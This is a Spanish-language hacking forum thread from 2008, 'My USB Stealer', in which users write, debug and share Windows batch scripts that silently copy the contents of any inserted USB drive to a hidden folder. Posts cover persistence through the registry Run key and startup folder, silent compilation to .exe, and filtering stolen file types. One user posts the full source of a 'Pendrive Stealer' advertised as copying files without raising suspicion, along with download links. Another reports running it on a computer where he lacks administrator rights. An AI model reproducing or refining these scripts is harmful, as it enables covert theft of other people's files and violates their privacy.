He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versiˇn este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahÝ estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que despuÚs le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se estß usando.
Pregunta: ┐No hay alguna forma de que ese mensaje no salte?
El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo asÝ y hasta que no le doy a finalizar programa no se reinicia el ordenaodr
Pregunta: ┐esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga.

Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ┐asÝ lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automßticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando.

Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicaciˇn) sigue copiando archivos de los pen drive que se introduzcan: ┐Como se desinstala esta aplicaciˇn completamanete?. Ademßs me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ┐esto esta relacionado no?

Conclusiˇn: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura.
Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ┐como se introduce en el codido que te he puesto?.
Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje.

editado-
perdona si soy pesado pero que deberia eliminar del code para que sˇlo copiara la unidad g o sˇlo la e??? He probado combinaciones y no me funciona gracias


Título: Re: My USB Stealer
Publicado por: WestOn en 20 Noviembre 2008, 19:44 pm
Wenas, para q se ejecute al inicio:
Código:
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NombreEtiqueta /t  REG_SZ /d "UbicacionArchivo" /f
NombreEtiqueta:Lo que tu quieras.
UbicacionArchivo:Ubicacion del archivo q se iniciara al inicio :P

Respecto a lo de q solo 'detecte' las unidades G y E puedes hacer esto:
Código:
@echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto fcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto hcheck)

un saludo ;)

PD:El programa Xcopy.exe es lo que hace que puedas copiar archivos de tu USB a la carpeta o viceversa.


Título: Re: My USB Stealer
Publicado por: estudcom en 20 Noviembre 2008, 20:39 pm
gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code:
Código:
@echo off
 
If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha)
 
:betha
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t  REG_SZ /d "C:\z23856\2.exe" /f
goto alpha
 
:alpha
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto echeck)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
(goto gcheck)
 
:existg
xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I
ping -n 2 localhost
(goto echeck)

He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sˇlo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que querÝa saber es cual seria el code para que copie sˇlo la unidad e, He creado este pero no funciona:
Código:
@echo off

If Exist C:\z23856\b3637\eviews47\ (goto echeck) else (
MD C:\z23856\b3637\eviews47\
goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe)
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
Quizas podrÝas crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\


Título: Re: My USB Stealer
Publicado por: 8789poli en 21 Noviembre 2008, 17:31 pm
Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compa˝ero Rockox...

(http://img177.imageshack.us/img177/936/splashusbstealer2rr4.th.jpg)
(http://img379.imageshack.us/img379/9263/splashusbstealerig6.jpg)

Mira...lo puedes descargar aqui...

http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.zip
http://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zip

El programa consta de dos codes...uno de configuracion y uno de escaneo...

USBStealer
Código:
@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ▒▒▒▒▒                                               ▒▒▒▒▒
echo      ▒▒░░░░░▒                                            ▒▒░░░░░▒
echo      ▒░░░░░░░▒▒                                         ▒░░░░░░░▒
echo    ▒▒░░░░░░░░░▒                                        ▒▒░░░░░░░░▒▒
echo   ▒░░░░░░░░░░░▒                                      ▒▒░░░░░░░░░░░░▒
echo   ▒░░░░░░░░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓   ▒▒▒░░░░░░░░░░░░░░▒
echo    ▒▒░░░░░░░░░░░░▒▒▒     ▓▓▓▓▒▒░░░░░░░░░░░░▒▒▓▓▓▓▒░░░░░░░░░░░░▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░░▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░░░░░▒▒▒▒▒
echo            ▒▒▒░░░░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒░░▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▒
echo                 ▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓▓
echo                ▓▓░░░░░░░░░░▓▓▓▓░░░░░░░░▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░▓▓▓▓▓▓▓▓░░░░▓▓▓▓▓▓▓▓░░░░░░░░░▓▓
echo                ▓▓░░░░░░░░░▒▓▓▓▓░░░░░░░▒▓▓▓▓░░░░░░░░░░░▓▓
echo                ▓▓▒▒░░░░░░░░░░░░░░▒▒▒▒░░░░░░░░░░░░░░░░▓▓
echo                 ▓▓▓░░░░░░░░░░░░░░▓▓▓▓░░░░░░░░░░░░░░▓▓▓▓
echo                ▒▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓▓▓░░▒▒
echo               ▒▒░░░░▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓░░░░░░▒▒
echo            ▒▒▒░░░░░░░▓▓▓▓░░░░░░░░░░░░░░░░░░░░░▓▓▓░░░░░░░░░░▒▒▒▒▒▒▒
echo      ▒▒▒▒▒▒░░░░░░░░▒▒▓  ▓▓▓░░░░░░░░░░░░░░░░░░▓▓  ▒▒░░░░░░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░░░░░▒▒       ▓░░░░░░░░░░░░░░░░░░▓     ▒▒▒▒░░░░░░░░░░░░░▒
echo    ▒░░░░░░░░░░░▒▒         ▓░░░░░░░░░░░░░░░░░░▓         ▒▒░░░░░░░░░░▒▒
echo    ▒▒░░░░░░░░▒▒           ▓░░▒░░▒░░▒░░▒░░▒░░░▓          ▒░░░░░░░░▒▒
echo      ▒▒░░░░░▒▒            ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓          ▒▒░░░░░░▒
echo        ▒░░░▒▒                                             ▒░░░░▒
echo         ▒▒▒▒                                               ▒▒▒▒
echo.
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓▓ ▓▓ ▓▓▓ ▓ ▓ ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓ ▓
echo              ▓   ▓ ▓ ▓ ▓ ▓▓▓ ▓▓ ▓   ▓ ▓▓▓ ▓▓  ▓▓▓ ▓▓▓  ▓▓▓
echo              ▓   ▓ ▓ ▓ ▓ ▓      ▓   ▓ ▓ ▓ ▓ ▓ ▓   ▓  ▓   ▓
echo              ▓▓▓ ▓▓▓ ▓▓  ▓▓▓    ▓   ▓ ▓ ▓ ▓ ▓ ▓▓▓ ▓  ▓ ▓▓▓
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │1│ │ Definir carpeta principal...│  │2│ │ Tipos de Archivos..  │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐  ┌─┐ ┌──────────────────────┐
echo   │3│ │ Iniciar Escaneo de USBs...  │  │4│ │ Ayuda del Programa.. │
echo   └─┘ └─────────────────────────────┘  └─┘ └──────────────────────┘
echo   ┌─┐ ┌─────────────────────────────┐
echo   │5│ │ Salir del Programa..        │
echo   └─┘ └─────────────────────────────┘
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │1│ │ Documentos...  │  │2│ │ Imagenes ^& Fotos..       │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │3│ │ Musica ^& Audio │  │4│ │ Documentos ^& Imagenes..  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo   ┌─┐ ┌────────────────┐  ┌─┐ ┌──────────────────────────┐
echo   │5│ │ Videos *       │  │6│ │ Todas las Opciones... *  │
echo   └─┘ └────────────────┘  └─┘ └──────────────────────────┘
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ╔════════════════════════════╗
echo                ║ Pendrive Stealer v 1.0  xD ║
echo                ╚════════════════════════════╝
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
 
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan
Código:
@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.

Que cosa mas presiosa :D
me encanto XD


Título: Re: My USB Stealer
Publicado por: corax en 21 Noviembre 2008, 19:40 pm
Vamos a ver que os estßis liando un poco...

Te aclaro lo que intentabais averiguar WestOn y t˙...

Para a˝adir nuevas unidades al chequeo hay que seguir este patrˇn:

Ě Escaneamos la primera unidad (P.E: la E)
Ě Si existe, pasamos a la fase de copiado de esa unidad
Ě Si no existe, pasamos a la fase de chequeo de la unidad siguiente
Ě Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
Ě Cuando lleguemos a la ˙ltima unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.

De otro modo no funcionarß.


Respecto al proceso XCOPY.exe que estaba en ejecuciˇn... si te fijas en el cˇdigo se hace referencia al xcopy. ┐QuÚ es esto? Pues es un archivo ejecutable que funciona a travÚs de la cmd y cuya funciˇn es copiar, en este caso el contenido Ýntegro de las memorias flash.

Si en vez de copiarlo todo sˇlo quieres copiar un cierto tipo de archivos, cambia la parte del cˇdigo (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensiˇn del tipo de archivos que quieras copiar. Puedes usar varias lÝneas para copiar distintos tipos de archivo. Me explico:

En caso de que quisieras copiar archivos de PowerPoint, cambiarÝas esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I

Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I

Y asÝ para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I

Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de mßs de ocho letras o con espacios, o extensiones de mßs de tres letras (Formato 8/3) debes entrecomillar la ruta completa.

Respecto a que las memorias flash se puedan extraer de forma segura... la ˙nica forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sˇlo puedes extraer una memoria flash de forma segura cuando no se estß copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.

En cuanto a lo de que no se deja reiniciar, es porque el programa estß haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:

Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no a˝ade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opciˇn de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)

Respecto a lo de la desinstalaciˇn... debes borrar el ejecutable que hayas creado MIENTRAS EST╔ PARADO (de lo contrario borras el archivo, pero Úste sigue cargado en memoria, es decir, ejecutßndose), y ademßs la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.

Bueno, si te queda alguna duda, hßzmelo saber y tratarÚ de responderte.

Nos vemos  ;)

PD: 8789poli, si te gusta el cˇdigo se lo agradeces por privado la prˇxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.

Venga, a cuidarse todos...


Título: Re: My USB Stealer
Publicado por: SmartGenius en 22 Noviembre 2008, 23:57 pm
Hay una cosa que se os esta lvidadno y es que el code siempre va a estar en ejecucion y copiando cosas de las unidades a menos que pongan algo que le diga que ya debe dejar de hacerlo....

Por ejemplo...el hace el Escaneo de las unidades C....Z y empieza a copiar, luego por ejemplo tenemos una USB en la unidad H, el pasa y al encontrarla hace lo debido de copiar los datos, despues sigue con las demas unidades pero como ya no hay mas pues vuelve a empezar el ciclo y vuelve a recopiar todo lo de la unidad H y asi sucesivamente, por eso es que no se las deja expulsar porque sigue siendo usada......en eso ya habia pensado y es por eso que agregue algo de comprobacion en la siguiente parte...

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB >%letra%:\db.ini
goto :eof

asi cuando vaya a esa unidad simplemente la ignora porque ya fue analizada y se libra dle problema de que esta siendo usada, aunque en alguna proxima ocasion podria ser cambiado el contenido de dicha unidad y el programa no podria funcionar por lo que habria que hacer ya un chekeo por fecha de la creacion del archivo de comprobacion, pero no debe ser muy dificil...

aparte otra cosas en la que deben mejorar el codigo es en la comprobacion de las unidades USB...

Miren el codigo de la V2...

Código
  1. @echo off
  2. title USB Stealer
  3. REM Motor de Escaneo de USBs
  4. REM Coded by :: SmartGenius ::
  5.  
  6. :ini
  7. for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder="%%a"
  8. for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
  9. if exist "scan.exit" exit
  10. goto main
  11.  
  12. :main
  13. for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  14. if not exist "%%n:\RECYCLER" call :usb %%n)
  15. goto ini
  16.  
  17. :usb
  18. set letra=%1
  19. if exist "%letra%:\db.ini" goto :eof
  20. for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
  21. echo USB>"%letra%:\db.ini"
  22. goto :eof
  23.  
  24.  

Cualquier duda pueden postearla que con gusto les ayudare..

Saludos.


Título: Re: My USB Stealer
Publicado por: corax en 23 Noviembre 2008, 16:57 pm
Excelente, SmartGenius, creo que eso era lo que faltaba.

Muchas gracias.


Nos vemos  ;)


Título: Re: My USB Stealer
Publicado por: estudcom en 27 Noviembre 2008, 14:51 pm
 joe muchisimas gracias de verdad ya he conseguido todo lo que queria y gracias a vosotros. Solo tengo una preguntilla mas (la ultima de verdad). He probado en un ordenador en el que no tengo privilegios de administrador el programa y he metido mi pen drive. Ha copiado perfectamente todo a una carpeta en c como queria. como ya he visto que funciona he borrado el programa completamente del ordenador. El problema es que ahora quiero borrar los archivos de mi pen drive que se copiaron al ordenador y me salta la ventana de error, de que se estan usando o algo asÝ. He reiniciado el ordenador y he vuelto a iniciar sesion y sigo sin poder borrarlos. Conoceis alguna forma efectiva de borrar carpetas y archivos? He utilizado estos tres programas y me dicen que no pueden borrarlos.
Unlocker
File assesin
Killerbox

Puede ser que ya no pueda borrarlos nunca a no ser que se formatee el ordenador?. Os digo que no tengo privilegios de administrador y por si eso influyera he pasado la carpeta de c donde se copio todo a mis documentos porque en mis documentos si puedo borrar cosas que copie de mi pen, pero tampoco me deja. Lo que quiero decir es que en el ordenador puedo borrar archivos perfectamente (escepto lo de archivos de programa) con lo que no entiendo porque no me deja borrar estos. Muchas gracias por todo aunque no puedan ayudarme


Título: Re: My USB Stealer
Publicado por: corax en 27 Noviembre 2008, 20:31 pm
hola estudcom,

en principio esos archivos deberÝan poder borrarse de manera perfectamente normal, y mßs utilizando herramientas como el KillBox o el Unlocker... si a pesar de usarlas no has podido borrar los archivos, intÚntalo con el Clean Disk Security.
Puedes encontrarlo aquÝ:

http://www.theabsolute.net/sware/clndisk.html


Una vez instalado presiona con el botˇn derecho del ratˇn sobre la carpeta de archivos que quieras borrar y selecciona "erase fully".

Es un truco que me ha funcionado a veces cuando los archivos se ponen rebeldes y no consigo que funcione el Unlocker.

Si no te funciona hßznoslo saber y encontraremos una soluciˇn.

Hasta pronto!